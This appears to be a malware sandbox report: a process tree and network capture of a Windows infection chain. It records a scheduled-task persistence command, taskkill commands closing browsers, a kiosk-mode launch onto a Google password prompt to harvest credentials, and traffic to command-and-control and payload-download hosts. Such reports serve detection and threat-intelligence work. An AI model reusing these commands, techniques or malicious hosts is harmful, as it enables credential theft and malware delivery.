      PID:3152
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4044
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 964
      4⤵
      Loads dropped DLL
      Program crash
      PID:3780
- - C:\Users\Admin\AppData\Local\Temp\1009176001\72c1b8c8ee.exe
    "C:\Users\Admin\AppData\Local\Temp\1009176001\72c1b8c8ee.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:2824
- - C:\Users\Admin\AppData\Local\Temp\1009177001\f8bcf7e83e.exe
    "C:\Users\Admin\AppData\Local\Temp\1009177001\f8bcf7e83e.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1548
- - C:\Users\Admin\AppData\Local\Temp\1009178001\3acce6d1d3.exe
    "C:\Users\Admin\AppData\Local\Temp\1009178001\3acce6d1d3.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2324
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3028
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2872
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2236
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1260
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1684
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:2300
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.0.1521835580\443173919" -parentBuildID 20221007134813 -prefsHandle 1232 -prefMapHandle 1224 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa605ca8-296e-496f-be7e-36a2b5d48381} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 1316 123d7f58 gpu
        6⤵
        
        PID:2388
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.1.559574119\949255133" -parentBuildID 20221007134813 -prefsHandle 1500 -prefMapHandle 1496 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc05fc4a-277c-4218-bfe7-302f8d128afc} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 1512 d73c58 socket
        6⤵
        
        PID:2916
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.2.2051334069\1650073809" -childID 1 -isForBrowser -prefsHandle 2052 -prefMapHandle 2044 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {729d9f6e-9e4e-467c-ba01-17836d18780a} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 2064 1a887758 tab
        6⤵
        
        PID:2308
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.3.2049559314\1488355387" -childID 2 -isForBrowser -prefsHandle 2888 -prefMapHandle 2884 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b218cbc5-69f3-486c-8449-ccf877569488} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 2900 1d432c58 tab
        6⤵
        
        PID:1640
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.4.993723458\1787661929" -childID 3 -isForBrowser -prefsHandle 3780 -prefMapHandle 2536 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {70692aef-9ef4-4b59-a2a0-8b43347af842} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 3792 1dcd9858 tab
        6⤵
        
        PID:2008
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.5.814965571\1384495021" -childID 4 -isForBrowser -prefsHandle 3900 -prefMapHandle 3904 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {65bd3964-ec30-4ad2-b2bd-af28c256b23d} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 3888 20d0a258 tab
        6⤵
        
        PID:2276
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.6.1795743630\1988258589" -childID 5 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b980f757-a634-45be-aeb1-80a9ef2575ea} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 4052 20d07858 tab
        6⤵
        
        PID:2960

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3956

C:\Windows\system32\taskeng.exe
taskeng.exe {C687DA26-3FD5-492D-9541-C62DC3EE0EAE} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
1⤵
PID:3668
- C:\Users\Admin\AppData\Local\Temp\service123.exe
  C:\Users\Admin\AppData\Local\Temp\/service123.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3760

Network

POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:58:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 156
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:58:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:58:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:58:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:58:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:58:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:58:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:59:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://31.41.244.11/files/7407486059/1Shasou.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/7407486059/1Shasou.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:58:16 GMT
Content-Type: application/octet-stream
Content-Length: 30208
Last-Modified: Tue, 26 Nov 2024 00:13:04 GMT
Connection: keep-alive
ETag: "67451290-7600"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/random.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/random.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:58:18 GMT
Content-Type: application/octet-stream
Content-Length: 4375040
Last-Modified: Mon, 25 Nov 2024 21:29:06 GMT
Connection: keep-alive
ETag: "6744ec22-42c200"
Accept-Ranges: bytes
DNS

home.fvtekk5pn.top

ba9783936d.exe

Remote address:

8.8.8.8:53

Request

home.fvtekk5pn.top

IN A

Response
DNS

home.fvtekk5pn.top

ba9783936d.exe

Remote address:

8.8.8.8:53

Request

home.fvtekk5pn.top

IN AAAA

Response

home.fvtekk5pn.top

IN A

34.116.198.130
GET

http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347

ba9783936d.exe

Remote address:

34.116.198.130:80

Request

GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1
Host: home.fvtekk5pn.top
Accept: */*

Response

HTTP/1.1 200 OK

server: nginx/1.22.1
date: Tue, 26 Nov 2024 01:58:24 GMT
content-type: application/octet-stream
content-length: 10815536
content-disposition: attachment; filename="36EpLiutqfXtaXMkXOTru;"
last-modified: Tue, 19 Nov 2024 12:29:07 GMT
cache-control: no-cache
etag: "1732019347.4431374-10815536-3919321515"
GET

http://185.215.113.16/luma/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /luma/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:58:25 GMT
Content-Type: application/octet-stream
Content-Length: 1852928
Last-Modified: Tue, 26 Nov 2024 01:26:08 GMT
Connection: keep-alive
ETag: "674523b0-1c4600"
Accept-Ranges: bytes
GET

http://185.215.113.16/steam/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /steam/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:58:30 GMT
Content-Type: application/octet-stream
Content-Length: 1796608
Last-Modified: Tue, 26 Nov 2024 01:26:15 GMT
Connection: keep-alive
ETag: "674523b7-1b6a00"
Accept-Ranges: bytes
GET

http://185.215.113.16/well/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /well/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:58:33 GMT
Content-Type: application/octet-stream
Content-Length: 923136
Last-Modified: Tue, 26 Nov 2024 01:24:22 GMT
Connection: keep-alive
ETag: "67452346-e1600"
Accept-Ranges: bytes
GET

http://185.215.113.16/off/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /off/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Nov 2024 01:58:37 GMT
Content-Type: application/octet-stream
Content-Length: 2793472
Last-Modified: Tue, 26 Nov 2024 01:24:48 GMT
Connection: keep-alive
ETag: "67452360-2aa000"
Accept-Ranges: bytes
DNS

property-imper.sbs

72c1b8c8ee.exe

Remote address:

8.8.8.8:53

Request

property-imper.sbs

IN A

Response
DNS

frogs-severz.sbs

72c1b8c8ee.exe

Remote address:

8.8.8.8:53

Request

frogs-severz.sbs

IN A

Response
DNS

occupy-blushi.sbs

72c1b8c8ee.exe

Remote address:

8.8.8.8:53

Request

occupy-blushi.sbs

IN A

Response

occupy-blushi.sbs

IN A

104.21.7.169

occupy-blushi.sbs

IN A

172.67.187.240
POST

https://occupy-blushi.sbs/api

72c1b8c8ee.exe

Remote address:

104.21.7.169:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: occupy-blushi.sbs

Response

HTTP/1.1 200 OK

Date: Tue, 26 Nov 2024 01:58:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=nb9nrkoe4ki6t178jungolbmle; expires=Fri, 21-Mar-2025 19:45:07 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QZepQ%2F%2BKIePGCEYuLnFhgMid5XkOvMUwQt8lNKMyp4IKB8NBhqZWYeeUnJtKwd2bQMHypciLWtYDapi8W0uU8TLqedhia%2Bk0JsoCHx4wnCRuyZ1MXHfNi4tUm0Te3cIqygniWg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e86460ecef8634c-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=66113&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2859&recv_bytes=585&delivery_rate=59235&cwnd=253&unsent_bytes=0&cid=9ff8c786edde2575&ts=296&x=0"
DNS

blade-govern.sbs

72c1b8c8ee.exe

Remote address:

8.8.8.8:53

Request

blade-govern.sbs

IN A

Response

blade-govern.sbs

IN A

172.67.153.209

blade-govern.sbs

IN A

104.21.80.208
POST

https://blade-govern.sbs/api

72c1b8c8ee.exe

Remote address:

172.67.153.209:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: blade-govern.sbs

Response

HTTP/1.1 200 OK

Date: Tue, 26 Nov 2024 01:58:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=rkftdc2s449259k62i9aam3e1g; expires=Fri, 21-Mar-2025 19:45:08 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FV%2FA7msgYMRJdwmPd1xqkTJgufk2ZIYGXckRpRs4Baa%2B%2BzFzfeRg%2FZGAcBuuEo2toa2Sf5ojja8EIcfU%2B1mjVeqBxuecZQKgF49qGbSbyaHBslOgAEU4Pbz2Ty5g2YaE03bU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e864611aed66413-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=62636&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2856&recv_bytes=584&delivery_rate=62490&cwnd=253&unsent_bytes=0&cid=d27be985b453c24d&ts=279&x=0"
DNS

story-tense-faz.sbs

72c1b8c8ee.exe

Remote address:

8.8.8.8:53

Request

story-tense-faz.sbs

IN A

Response

story-tense-faz.sbs

IN A

104.21.1.25

story-tense-faz.sbs

IN A

172.67.151.225
POST

https://story-tense-faz.sbs/api

72c1b8c8ee.exe

Remote address:

104.21.1.25:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: story-tense-faz.sbs

Response

HTTP/1.1 200 OK

Date: Tue, 26 Nov 2024 01:58:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=0kb8osvf8fou92di10vnc7nafr; expires=Fri, 21-Mar-2025 19:45:08 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CAEMfNTzaRhqBeF87Vm9ZzwjqBB5vQSMLtHArFUl9udBBWvvTtZMAQJlgJq3ZGJ8Gpmf9ym3Vuxp169bwOZYyVzIz%2FfCX6BIYY8olr474g8fME%2F%2FGKOZ01%2BD%2BqcJWspZC4I1XTSk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8646149e2a4195-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=60713&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2865&recv_bytes=587&delivery_rate=64251&cwnd=251&unsent_bytes=0&cid=05c001eb738c4a0e&ts=257&x=0"
DNS

leg-sate-boat.sbs

72c1b8c8ee.exe

Remote address:

8.8.8.8:53

Request

leg-sate-boat.sbs

IN A

Response
DNS

disobey-curly.sbs

72c1b8c8ee.exe

Remote address:

8.8.8.8:53

Request

disobey-curly.sbs

IN A

Response

disobey-curly.sbs

IN A

172.67.223.140

disobey-curly.sbs

IN A

104.21.70.128
POST

https://disobey-curly.sbs/api

72c1b8c8ee.exe

Remote address:

172.67.223.140:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: disobey-curly.sbs

Response

HTTP/1.1 200 OK

Date: Tue, 26 Nov 2024 01:58:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=clrfrrp4p673vaofrholkqsorb; expires=Fri, 21-Mar-2025 19:45:09 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R2CRW9ZP5x1wsFUG6CO%2F7BYhpXjRvhvyadROMa%2FKISF9GXkEzJlfRcG1qmMFy3Am7WHLZzPHWDfAaOZkqwTWWm3VBrnt%2Bvo7JuVB%2FdFLpEQR0BFt94mIPpk2sxrX3GKmZayaEg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8646180efc947d-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=62053&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2862&recv_bytes=585&delivery_rate=55473&cwnd=253&unsent_bytes=0&cid=f3cdef6c148ba31a&ts=255&x=0"
DNS

motion-treesz.sbs

72c1b8c8ee.exe

Remote address:

8.8.8.8:53

Request

motion-treesz.sbs

IN A

Response

motion-treesz.sbs

IN A

104.21.94.231

motion-treesz.sbs

IN A

172.67.141.76
POST

https://motion-treesz.sbs/api

72c1b8c8ee.exe

Remote address:

104.21.94.231:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: motion-treesz.sbs

Response

HTTP/1.1 200 OK

Date: Tue, 26 Nov 2024 01:58:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=s16gsg67c6hft91fovk3ckr0fp; expires=Fri, 21-Mar-2025 19:45:09 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iex5iz7HZFmiggYTa5uVBkgFIjGYMExJq6tBYnrxFs59n31LdpR3tPX1DRr%2FXzz%2Fe3Fn0welvuEwyKIAX%2BtVXWADSYZBANoAgs9yZrQZLLAMAmicm4KslNixZLFeauS0kbKViw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e86461abe6e9494-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=61468&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2859&recv_bytes=585&delivery_rate=63025&cwnd=253&unsent_bytes=0&cid=c575de0f3788be7e&ts=277&x=0"
DNS

powerful-avoids.sbs

72c1b8c8ee.exe

Remote address:

8.8.8.8:53

Request

powerful-avoids.sbs

IN A

Response

powerful-avoids.sbs

IN A

104.21.19.173

powerful-avoids.sbs

IN A

172.67.187.4
POST

https://powerful-avoids.sbs/api

72c1b8c8ee.exe

Remote address:

104.21.19.173:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: powerful-avoids.sbs

Response

HTTP/1.1 200 OK

Date: Tue, 26 Nov 2024 01:58:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=rue3g4m195b50r52djkrd2ff0e; expires=Fri, 21-Mar-2025 19:45:10 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vg0XbikNlfuJYzVyDRhNwOqHITZ35XiE%2FRBH00LY%2FeStuPk7gppCAo2DUCC8wt8jJ6gq0F9DxhvJrL65So0rCTBb%2Bxj%2FKkoKls6y41f%2BOyiT9GS74%2B5G9rqK9jcuOb84EQqywxug"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e86461dcf77be98-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=65721&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2866&recv_bytes=587&delivery_rate=59996&cwnd=253&unsent_bytes=0&cid=4da52e9da1a1bce3&ts=287&x=0"
DNS

steamcommunity.com

72c1b8c8ee.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

2.22.99.85
GET

https://steamcommunity.com/profiles/76561199724331900

72c1b8c8ee.exe

Remote address:

2.22.99.85:443

Request

GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
